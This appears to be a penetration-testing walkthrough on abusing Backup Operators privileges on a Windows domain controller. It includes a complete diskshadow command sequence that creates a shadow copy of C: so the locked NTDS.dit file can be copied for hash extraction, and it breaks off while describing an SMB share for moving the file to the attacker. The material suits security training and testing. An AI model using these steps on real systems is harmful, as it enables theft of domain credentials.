Members of this group are granted with seBackup and seRestore privileges
The former allows an operator who have compromised a user account with this privileged to be able to bypass any existing ACE on any system folder and also copy any file inside it
Bear in mind that members of this group can log in to a DC interactively
Therefore, we can log in locally to a DC and try to extract the NTDS.dit file information in order to retrieve most of the sensitive domain data such as NTLM hashes, AES keys and so on
Performing a Shadow Copy of C:
From the target 🎯
We cannot copy the NTDS.dit file directly as it is locked by default, just as with SAM, SYSTEM and SECURITY files
However, we can carry out a shadow copy of the C: volume and expose it as an E: drive in order to access all the resources of the given shadow copy
To do so, we can proceed as follows
diskshadow.exe
DISKSHADOW> set verbose onDISKSHADOW> set metadata C:\Windows\Temp\meta.cabDISKSHADOW> set context clientaccessibleDISKSHADOW> set context persistentDISKSHADOW> begin backupDISKSHADOW> add volume C: alias cdriveDISKSHADOW> createDISKSHADOW> expose %cdrive% E:DISKSHADOW> end backupDISKSHADOW> exit
Setting up a File Transfer Alternative
From the target 🎯
Since we want to transfer the sensitive file we are going to copy to the attacker’s machine for further processing, we can set an SMB share as follows